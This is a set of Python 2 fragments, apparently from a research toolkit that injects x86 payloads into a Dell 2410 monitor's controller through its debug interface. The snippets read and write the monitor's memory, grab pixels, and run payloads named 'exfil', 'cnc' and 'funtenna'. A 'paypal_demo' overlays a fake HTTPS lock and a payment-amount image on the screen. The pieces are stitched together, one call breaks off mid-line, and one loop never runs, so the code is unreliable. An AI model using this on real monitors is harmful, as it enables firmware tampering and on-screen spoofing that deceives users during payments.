def memcpy(dev, dst_seg, src_seg, dst_off, src_off, len):
payload = X86Payload("memcpy")
payload.replace_word(0xadad, dst_seg)
payload.replace_word(0xabab, src_seg)
payload.replace_word(0xacac, dst_off)
payload.replace_word(0xaeae, src_off)
payload.replace_word(0xafaf, len)
execute_payload(dev, payload, 0x600)
def mem_read(dev, segment=0xf000, start_offset=0, l=0x2000):
extracted_mem = ''
end_offset = start_offset + l
payload = X86Payload("exfil")
payload.replace_word(0xadad, segment)
try:
for i in xrange(start_offset, end_offset, 6):
new = copy.deepcopy(payload)
new.replace_word(0xacac, i)
execute_payload(dev, new, 0x500)
time.sleep(0.03)
for i in range(FREE_REG_ADDR_END, FREE_REG_ADDR_END, 2):
extracted_mem += dev.reg_read(i)
time.sleep(0.03)
except Exception as e:
print str(e)
finally:
return extracted_mem
def sdram_write(dev,
src_seg=0,
src_off=0,
reg_hi=0,
reg_lo=0,
height=0,
width=0,
stride=0,
ram_write_addr=0x690):
payload = X86Payload("sdram_write")
payload.replace_word(0xacac, src_off)
payload.replace_word(0xadad, src_seg)
payload.replace_word(0xaeae, height)
payload.replace_word(0xafaf, width)
payload.replace_word(0xbdbd, stride)
payload.replace_word(0xbcbc, reg_hi)
payload.replace_word(0xbebe, reg_lo)
execute_payload(dev, payload, ram_write_addr)
def grab_pixel(dev, vertical_coord, horizontal_coord, memory_dump_addr=0x4000):
"""grab pixel values in R G B format """
payload = X86Payload("grab_pixel")
payload.replace_word(0xaeae, vertical_coord)
payload.replace_word(0xbebe, horizontal_coord)
payload.replace_word(0xcece, memory_dump_addr)
execute_payload(dev, payload, 0x600)
segment_hi = memory_dump_addr >> 16
segment_lo = memory_dump_addr & 0xffff
extracted_dump_data = mem_read(dev,
segment=segment_hi,
start_offset=segment_lo,
l=0x6)
color_val = {
'R': struct.unpack('<H', extracted_dump_data[:2]),
'G': struct.unpack('<H', extracted_dump_data[2:4]),
'B': struct.unpack('<H', extracted_dump_data[4:6]),
}
return color_val
#!/usr/bin/python2
import protocol
import delltools
import binascii
from payload import X86Payload
payload = X86Payload("show_debug_irq")
dell = protocol.Dell2410()
dell.initialize()
dell.debug_on()
delltools.execute_payload(dell, payload, 0x500)
bytes = dell.reg_read(0x3a5a)
value = ord(bytes[0]) | (ord(bytes[1]) << 8)
print "The value at 0x3a5a is: %s" % hex(value)
dell.debug_off()
ARGS = [{
'args': ('--paypal_demo', '-p'),
'kwargs': {
'action': 'store_true',
'help': "do the paypal_demo"
},
}]
parser = argparse.ArgumentParser(description='patch vsync interrupt')
for arg in ARGS:
parser.add_argument(*arg['args'], **arg['kwargs'])
args = parser.parse_args()
payload = X86Payload("cnc")
dell = protocol.Dell2410()
dell.initialize()
dell.debug_on()
if args.paypal_demo:
lock_image = DellImage("lock_https.gif")
lock_metainfo, _ = delltools.upload_single_image(dell, lock_image,
0x600000)
delltools.put_image(dell, lock_metainfo, 0x63, 0x4a)
time.sleep(2)
# put default image
amount_image = DellImage("amount_image.png", 255 - lock_image.colors)
amount_metainfo, _ = delltools.upload_single_image(
dell, amount_image, 0x600000, clut_offset=lock_image.colors)
delltools.put_image(dell,
def transfer_clut(dev, clut_table, clut_low=0x7000):
payload = X86Payload("transfer_clut")
payload.replace_word(0xadad, 0x0000) # clut_high
payload.replace_word(0xacac, clut_low)
bulk_write_data(dev, clut_low, clut_table)
execute_payload(dev, payload, 0x600)
#!/usr/bin/python2
import time
import protocol
import delltools
from payload import X86Payload
payload = X86Payload("funtenna")
dell = protocol.Dell2410()
dell.initialize()
dell.debug_on()
delltools.execute_payload(dell, payload, 0x500)
time.sleep(10)
dell.debug_off()